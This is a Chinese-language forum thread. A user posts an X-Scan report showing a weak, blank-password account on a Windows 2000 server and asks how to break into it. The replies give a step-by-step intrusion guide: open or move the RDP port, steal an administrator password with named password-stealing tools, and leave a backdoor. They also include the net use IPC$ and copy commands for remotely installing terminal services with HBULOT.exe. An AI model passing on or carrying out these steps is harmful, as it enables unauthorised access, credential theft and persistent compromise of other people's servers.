扫到NT-SERVER弱口令怎么入侵？

本报表列出了被检测主机的详细漏洞信息, 请根据提示信息或链接内容进行相应修补. 欢迎参加X-Scan脚本翻译项目  

检测结果
存活主机 1
漏洞数量 1
警告数量 0
提示数量 8


主机列表
主机 检测结果
10.10.10.226 发现安全漏洞
主机摘要 - OS: Windows NT 5.0; PORT/TCP: 25, 53, 80, 135, 139, 443, 445, 8080

[返回顶部]

主机分析: 10.10.10.226
主机地址 端口/服务 服务漏洞
10.10.10.226 smtp (25/tcp) 发现安全提示
10.10.10.226 domain (53/tcp) 发现安全提示
10.10.10.226 www (80/tcp) 发现安全提示
10.10.10.226 netbios-ssn (139/tcp) 发现安全漏洞
10.10.10.226 https (443/tcp) 发现安全提示
10.10.10.226 microsoft-ds (445/tcp) 发现安全提示
10.10.10.226 unknown (8080/tcp) 发现安全提示
10.10.10.226 epmap (135/tcp) 发现安全提示


安全漏洞及解决方案: 10.10.10.226
类型 端口/服务 安全漏洞及解决方案
提示 smtp (25/tcp) A SMTP server is running on this port
Here is its banner :
220 dvdserver3 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Wed, 11 May 2005 03:30:17 +0800
NESSUS_ID : 10330

提示 domain (53/tcp) Maybe the "domain" service running on this port.
NESSUS_ID : 10330

提示 www (80/tcp) A web server is running on this port
NESSUS_ID : 10330

漏洞 netbios-ssn (139/tcp) NT-Server弱口令: "1/[空口令]"  
提示 netbios-ssn (139/tcp) Maybe the "netbios-ssn" service running on this port.
Here is its banner:
83 .
NESSUS_ID : 10330

提示 https (443/tcp) Maybe the "https" service running on this port.
NESSUS_ID : 10330

提示 microsoft-ds (445/tcp) Maybe the "microsoft-ds" service running on this port.
NESSUS_ID : 10330

提示 unknown (8080/tcp) Maybe the "Proxy server" service running on this port.
NESSUS_ID : 10330

提示 epmap (135/tcp) Maybe the "epmap" service running on this port.
NESSUS_ID : 10330

扫到的那个弱口令是GUEST级别的!没有办法上传东西!好晕哦!

开了3389端口，意味着可以远程登录，这可是微软给所有Windows用户献上的最大的木马
是改3389端口了，修改服务器端的端口设置
改完以后重起就生效了，这时在登陆器里IP:你改的端口，就可以登陆了
得到一个管理员的帐号，这里可以用FINDPASS和牛族NT/2000/XP密码大盗
记的留后门
个人意见仅参考

端口开了以后再怎么办大哥

一般来说是2000的
用3389登陆器就可以了
远程安装终端服务的方法:再开个CMD,输入net use \\ip\ipc$ 密码 /user:帐号 ,比如net use \\10.10.10.226\ipc$ netbadboy /user:administrator .连接成功后把HBULOT.EX拷上去,命令如下：copy HBULOT.exe \\ip\c$,这是安装终端服务的程序.在第一个CMD下输入,HBULOT.EXE /r,加上参数r是马上重启,而且是自动登陆,爽吧!过会它的3389端口就开了